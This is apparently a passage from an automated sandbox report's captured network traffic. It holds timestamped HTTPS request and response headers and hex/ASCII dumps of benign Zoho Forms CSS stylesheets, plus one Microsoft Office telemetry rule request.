                                                                                                                                                                                              Data Ascii: e;cursor: pointer;text-align: center;text-decoration: none;font-size: 13px;font-weight: 400;padding: 7px 20px;text-decoration: none;}.btnCurve:hover {text-decoration: none;}.btnSaveCurve {display: inline-block;outline: none;cursor: pointer;tex
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 09 68 65 69 67 68 74 3a 20 31 30 70 78 3b 09 70 61 64 64 69 6e 67 3a 20 35 70 78 3b 7d 2e 70 6f 70 75 70 48 65 61 64 65 72 20 2e 70 70 44 65 6c 65 74 65 49 63 6f 6e 20 7b 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 31 36 70 78 3b 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2d 31 36 70 78 3b 7d 2e 69 6d 61 67 65 54 79 70 65 5a 6f 6f 6d 7b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 2e 69 6d 61 67 65 54 79 70 65 5a 6f 6f 6d 20 2e 64 65 6c 65 74 65 20 73 76 67 20 7b 09 66 69 6c 6c 3a 20 23 66 66 66 66 66 66 3b 7d 2e 72 65 6d
                                                                                                                                                                                              Data Ascii: ext-decoration: none;background: #fff;height: 10px;padding: 5px;}.popupHeader .ppDeleteIcon {margin-top: -16px;margin-right: -16px;}.imageTypeZoom{ margin-top:0 !important; margin-bottom:0 !important; }.imageTypeZoom .delete svg {fill: #ffffff;}.rem
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 72 20 70 20 7b 09 63 6f 6c 6f 72 3a 20 23 36 65 36 65 36 65 3b 7d 2e 77 61 72 6e 69 6e 67 20 2e 6d 65 73 73 61 67 65 43 6f 6e 74 61 69 6e 65 72 20 73 70 61 6e 20 7b 09 63 6f 6c 6f 72 3a 20 23 43 32 37 36 30 36 3b 7d 2e 77 61 72 6e 69 6e 67 20 2e 70 6f 70 4d 73 67 49 63 6f 6e 20 7b 09 68 65 69 67 68 74 3a 20 33 37 70 78 3b 09 77 69 64 74 68 3a 20 33 37 70 78 3b 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 73 70 72 69 74 65 2e 63 64 34 38 38 33 61 65 38 33 36 31 33 39 38 61 61 61 39 62 39 37 39 30 38 64 37 63 38 32 61 65 2e 67 69 66 29 20 6e 6f 2d 72 65 70 65 61 74 20 2d 31 34 34 70 78 20 2d 31 39 36 70 78 3b 7d 2e 73 75 63 63 65 73 73 20 2e 6d 65 73 73 61 67 65 43 6f 6e 74 61 69 6e 65 72 20 73 70 61 6e 20 7b 09 63 6f 6c
                                                                                                                                                                                              Data Ascii: r p {color: #6e6e6e;}.warning .messageContainer span {color: #C27606;}.warning .popMsgIcon {height: 37px;width: 37px;background: url(../images/sprite.cd4883ae8361398aaa9b97908d7c82ae.gif) no-repeat -144px -196px;}.success .messageContainer span {col
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 66 33 66 33 3b 7d 2e 70 72 65 76 69 65 77 50 61 67 65 48 65 61 64 65 72 20 2e 7a 6d 65 6e 75 5f 5f 69 74 65 6d 2e 6f 6e 2d 68 6f 76 65 72 20 2e 7a 6d 65 6e 75 5f 5f 74 65 78 74 7b 20 63 6f 6c 6f 72 3a 20 23 32 34 41 36 38 41 3b 20 7d 2e 74 68 65 6d 65 50 6f 70 43 6f 6e 74 43 6f 6e 74 61 69 6e 65 72 20 7b 09 68 65 69 67 68 74 3a 20 35 30 30 70 78 3b 09 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 61 75 74 6f 3b 7d 2e 65 64 69 74 52 65 63 43 6f 6d 6d 65 6e 74 57 72 61 70 70 65 72 20 2e 73 75 62 6d 69 74 43 6f 6c 6f 72 20 7b 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 46 34 30 34 45 3b 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 37 70 78 3b 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 32 46 34 30 34 45 3b 7d 2e 65 64 69 74 52 65 63 43 6f 6d 6d 65 6e
                                                                                                                                                                                              Data Ascii: f3f3;}.previewPageHeader .zmenu__item.on-hover .zmenu__text{ color: #24A68A; }.themePopContContainer {height: 500px;overflow-y: auto;}.editRecCommentWrapper .submitColor {background: #2F404E;margin-right: 7px;border: 1px solid #2F404E;}.editRecCommen
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 46 30 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 65 72 72 4d 73 67 42 64 72 3a 68 6f 76 65 72 20 7b 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 46 30 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 65 72 72 4d 73 67 42 64 72 3a 66 6f 63 75 73 20 7b 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 46 30 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 65 72 72 4d 73 67 42 64 72 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 68 6f 76 65 72 20 7b 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 46 30 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 65 72 72 4d 73 67 42 64 72 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 20 7b 09 62 6f 72 64 65
                                                                                                                                                                                              Data Ascii: er: 1px solid #FF0000 !important;}.errMsgBdr:hover {border: 1px solid #FF0000 !important;}.errMsgBdr:focus {border: 1px solid #FF0000 !important;}.errMsgBdr[type="text"]:hover {border: 1px solid #FF0000 !important;}.errMsgBdr[type="text"]:focus {borde
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 3a 20 72 69 67 68 74 3b 7d 2e 70 6f 70 75 70 57 72 61 70 70 65 72 20 2e 70 6f 70 75 70 46 6f 74 74 65 72 57 72 61 70 70 65 72 20 62 75 74 74 6f 6e 20 7b 09 6d 61 72 67 69 6e 3a 20 30 20 35 70 78 3b 09 70 61 64 64 69 6e 67 3a 20 37 70 78 20 32 30 70 78 3b 7d 2e 73 74 61 74 75 73 43 6f 6e 74 57 72 61 70 20 7b 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 7d 2e 73 74 61 74 75 73 43 6f 6e 74 20 7b 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 37 70 78 3b 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 7d 2e 73 74 61 74 75 73 43 6f 6e 74 20 62 20 7b 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68
                                                                                                                                                                                              Data Ascii: : right;}.popupWrapper .popupFotterWrapper button {margin: 0 5px;padding: 7px 20px;}.statusContWrap {text-align: left;font-size: 15px;line-height: 24px;}.statusCont {text-align: left;line-height: 27px;font-size: 13px;}.statusCont b { font-weigh
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 68 65 69 67 68 74 3a 20 31 37 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 70 78 3b 20 7d 2e 70 43 6f 6e 74 61 69 6e 65 72 20 2e 72 75 6c 65 4c 69 73 74 20 7b 09 6d 61 72 67 69 6e 3a 20 31 35 70 78 20 30 20 31 35 50 58 3b 7d 2e 70 43 6f 6e 74 61 69 6e 65 72 20 2e 72 75 6c 65 4c 69 73 74 20 68 32 20 7b 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 70 43 6f 6e 74 61 69 6e 65 72 20 2e 72 75 6c 65 4c 69 73 74 20 68 32 2c 20 2e 70 43 6f 6e 74 61 69 6e 65 72 20 2e 66 69 65 6c 64 4c 69 73 74 20 68 32 20 7b 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 7d
                                                                                                                                                                                              Data Ascii: height: 17px; margin-top: 2px; }.pContainer .ruleList {margin: 15px 0 15PX;}.pContainer .ruleList h2 {font-weight: 500 !important;}.pContainer .ruleList h2, .pContainer .fieldList h2 {font-size: 13px;font-weight: 500;margin-bottom: 5px;clear: both;}
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 3a 20 23 66 35 66 35 66 35 3b 7d 2e 75 70 73 65 72 74 5f 6d 6f 76 65 20 7b 09 70 61 64 64 69 6e 67 3a 20 30 70 78 20 37 70 78 20 30 70 78 20 35 70 78 3b 09 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 31 65 31 65 31 3b 7d 2e 75 70 73 65 72 74 5f 6d 6f 76 65 20 73 76 67 20 7b 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 39 70 78 3b 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 36 70 78 3b 7d 2e 75 70 73 65 72 74 4e 75 6d 20 7b 09 63 6f 6c 6f 72 3a 20 23 38 38 38 38 38 38 3b 7d 2e 75 70 73 65 72 74 5f 6c 62 6c 54 78 74 20 7b 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 70 78 3b 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 7d 2e 69 63 6f 6e 2d 6d 6f 76 65 2d 73 79 6d 62 6f 6c 20 7b 09 77 69 64 74 68
                                                                                                                                                                                              Data Ascii: : #f5f5f5;}.upsert_move {padding: 0px 7px 0px 5px;border-right: 1px solid #e1e1e1;}.upsert_move svg {margin-top: 9px;padding-right: 6px;}.upsertNum {color: #888888;}.upsert_lblTxt {padding-left: 10px;display: inline-block;}.icon-move-symbol {width


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              51192.168.2.549778199.67.80.864431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC596OUTGET /forms/css/themes/custom.d603ed592e55f07d313b63112b930fbf.css HTTP/1.1
                                                                                                                                                                                              Host: static.zohocdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:23 UTC755INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                              Content-Length: 88667
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                              ETag: "04f4c958593f518c71b9b4e69a3182d6"
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Last-Modified: Fri, 29 Mar 2024 10:00:02 GMT
                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              strict-transport-security: max-age=15768000
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              x-cache: HIT
                                                                                                                                                                                              nb-request-id: 60d753221ad046cb612e0c980f6ccc24
                                                                                                                                                                                              z-origin-id: sa1-6edd1f53db934f349c5c827dc39dfd2a
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Strict-Transport-Security: max-age=64072000; includeSubDomains; preload
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:23 UTC3341INData Raw: 2f 2a 20 24 49 64 3a 20 24 20 2a 2f 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 2f 2a 20 43 53 53 20 44 6f 63 75 6d 65 6e 74 20 2a 2f 0a 0a 2f 2a 64 65 66 61 75 6c 74 54 68 65 6d 65 20 73 74 61 72 74 73 20 68 65 72 65 2a 2f 0a 0a 2e 62 61 63 6b 67 72 6f 75 6e 64 42 67 2c 20 2e 74 79 42 61 63 6b 67 72 6f 75 6e 64 42 67 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 7d 0a 0a 2e 62 61 63 6b 67 72 6f 75 6e 64 53 65 63 42 67 7b 20 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 09 0a 2e 74 65 6d 70 6c 61 74 65 57 69 64 74 68 2c 20 2e 74 79 54 65 6d 70 6c 61 74 65 57 69 64 74 68 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 0a 09 77 69 64 74 68 3a 38 30 30 70 78 3b 0a 09
                                                                                                                                                                                              Data Ascii: /* $Id: $ */@charset "UTF-8";/* CSS Document *//*defaultTheme starts here*/.backgroundBg, .tyBackgroundBg {background-color:#f5f5f5;}.backgroundSecBg{ margin:0;padding:0;}.templateWidth, .tyTemplateWidth {margin:0 auto;width:800px;
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 20 20 23 46 46 46 46 46 46 2c 20 20 23 46 34 46 34 46 34 29 3b 0a 09 66 69 6c 74 65 72 3a 20 20 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 73 74 72 3d 27 23 46 46 46 46 46 46 27 2c 20 65 6e 64 43 6f 6c 6f 72 73 74 72 3d 27 23 46 34 46 34 46 34 27 29 3b 0a 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 29 3b 0a 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 23 66 66 66 20 69 6e 73 65 74 3b 0a 09 62 6f 78 2d 73 68 61 64
                                                                                                                                                                                              Data Ascii: background: -moz-linear-gradient(top, #FFFFFF, #F4F4F4);filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#FFFFFF', endColorstr='#F4F4F4');-moz-box-shadow:0 1px 2px rgba(0, 0, 0, 0.1);-webkit-box-shadow:0 2px #fff inset;box-shad
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 65 69 67 68 74 3a 20 30 2e 36 30 65 6d 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 39 61 64 37 65 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 20 20 20 20 2d 6d 73 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 20 20 20 20 2d 6f 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 2e 32 30 65 6d 3b 0a 20 20 20 20 74 6f 70 3a 20 2e 35 30 65 6d 3b 0a 7d 0a 2e 74 68 72 65 65 43 6f 6c 75 6d 6e 73 2e 7a 66 43 75 73 52 61 64 69 6f 20 2e 74 65 6d 70 43 6f 6e 74
                                                                                                                                                                                              Data Ascii: eight: 0.60em; background: #09ad7e; -webkit-border-radius: 100%; -moz-border-radius: 100%; -ms-border-radius: 100%; -o-border-radius: 100%; border-radius: 100%; left: 0.20em; top: .50em;}.threeColumns.zfCusRadio .tempCont
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 27 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 7a 2d 69 6e 64 65 78 3a 20 31 30 30 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 09 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 09 2d 6f 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 7d 0a 2e 64 65 63 65 73 69 6f 6e 2e 6d 6f 64 65 6c 74 77 6f 2e 63 75 73 53 6d 61 6c 6c 20 2e 63 75 73 74 6f 6d 43 68 65 63 6b 42 6f 78 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 63 68 65 63 6b 65 64 20 2b 20 2e 63 75 73 43 68 6f 69 63 65 4c 61 62 65 6c 3a
                                                                                                                                                                                              Data Ascii: ';display: block;position: relative;z-index: 100;border-radius: 100%;-webkit-border-radius: 100%;-moz-border-radius: 100%;-o-border-radius: 100%;}.decesion.modeltwo.cusSmall .customCheckBox input[type="checkbox"]:checked + .cusChoiceLabel:
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 73 3a 20 35 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 2d 6f 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 31 70 78 3b 0a 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 31 35 30 6d 73 20 32 30 30 6d 73 2c 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 20 33 35 30 6d 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 37 38 2c 20 2d 31 2e 32 32 2c 20 30 2e 31 37 2c 20 31
                                                                                                                                                                                              Data Ascii: s: 50% !important; -moz-border-radius: 50% !important; -o-border-radius: 50% !important; vertical-align: -1px; float: left; -webkit-transition: background-color 150ms 200ms, -webkit-transform 350ms cubic-bezier(0.78, -1.22, 0.17, 1
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 20 30 2e 32 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 20 30 2e 32 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6f 70 61 63 69 74 79 20 30 2e 32 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 20 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 20 30 2e 32 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 20 20 20 20 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6f 70 61 63 69 74 79 20 30 2e 32 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 20 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 20 30 2e 32 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 20 20 20 20 2d 6d 73 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 6f 70 61 63 69 74 79 20 30 2e 32 35 73 20 65 61 73 65
                                                                                                                                                                                              Data Ascii: 0.25s ease-in-out, -webkit-transform 0.25s ease-in-out; -moz-transition: opacity 0.25s ease-in-out, -moz-transform 0.25s ease-in-out; -o-transition: opacity 0.25s ease-in-out, -o-transform 0.25s ease-in-out; -ms-transition: opacity 0.25s ease
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 63 6b 62 6f 78 22 5d 3a 63 68 65 63 6b 65 64 2c 20 2e 6d 6f 64 65 6c 6f 6e 65 20 2e 63 75 73 74 6f 6d 43 68 65 63 6b 42 6f 78 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 6e 6f 74 28 3a 63 68 65 63 6b 65 64 29 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 6f 70 61 63 69 74 79 3a 20 30 3b 0a 7d 0a 2e 7a 66 43 75 73 43 68 65 63 6b 62 6f 78 20 2e 74 65 72 6d 73 41 63 63 65 70 74 2e 63 75 73 74 6f 6d 43 68 65 63 6b 42 6f 78 20 2e 63 75 73 43 68 6f 69 63 65 4c 61 62 65 6c 7b 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 0a 7d 0a 2e 74 65 72 6d 73 57 72 61 70 70 65 72 2e 7a 66 43 75 73 43 68 65 63 6b 62 6f 78 20 2e 74 65 72 6d 73 41 63 63 65 70 74 2e 63 75
                                                                                                                                                                                              Data Ascii: ckbox"]:checked, .modelone .customCheckBox input[type="checkbox"]:not(:checked) {position: absolute;opacity: 0;}.zfCusCheckbox .termsAccept.customCheckBox .cusChoiceLabel{float: left;font-size: 15px;}.termsWrapper.zfCusCheckbox .termsAccept.cu
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 09 2d 6f 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 09 2d 6d 73 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 7d 0a 2e 6d 6f 64 65 6c 74 77 6f 20 2e 63 75 73 74 6f 6d 43 68 65 63 6b 42 6f 78 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 3a 3a 61 66 74 65 72 20 7b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 7d 0a 2e 6d 6f 64 65 6c 74 77 6f 20 2e 63 75 73 74 6f 6d 43 68 65 63 6b 42 6f 78 20 2e 63 75 73 43 68 6f 69 63 65 4c 61 62 65 6c 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69
                                                                                                                                                                                              Data Ascii: z-border-radius: 3px;-o-border-radius: 3px;-ms-border-radius: 3px;border-radius: 3px;}.modeltwo .customCheckBox input[type="checkbox"]::after {border-radius: 3px;}.modeltwo .customCheckBox .cusChoiceLabel {display: inline-block;cursor: poi
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 2e 32 30 65 6d 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 30 2e 39 30 65 6d 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 30 2e 39 30 65 6d 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a
                                                                                                                                                                                              Data Ascii: play: inline-block; position: relative; background-color: transparent; margin-top: 0.20em; width: 0.90em; height: 0.90em; -webkit-transform-origin: center; -ms-transform-origin: center; -moz-transform-origin: center;
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 20 6e 6f 6e 65 3b 0a 7d 0a 2e 6d 6f 64 65 6c 66 69 76 65 20 2e 63 75 73 74 6f 6d 43 68 65 63 6b 42 6f 78 20 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 2e 6d 6f 64 65 6c 66 69 76 65 20 2e 63 75 73 74 6f 6d 43 68 65 63 6b 42 6f 78 20 2e 63 75 73 43 68 6f 69 63 65 4c 61 62 65 6c 20 7b 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 2e 6d 6f 64 65 6c 66 69 76 65 20 2e
                                                                                                                                                                                              Data Ascii: none;}.modelfive .customCheckBox {position: relative; text-align: left; width: 100%; display: inline-block;}.modelfive .customCheckBox .cusChoiceLabel {cursor: pointer;display: block;margin: 0;position: relative;}.modelfive .


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              52192.168.2.54977013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
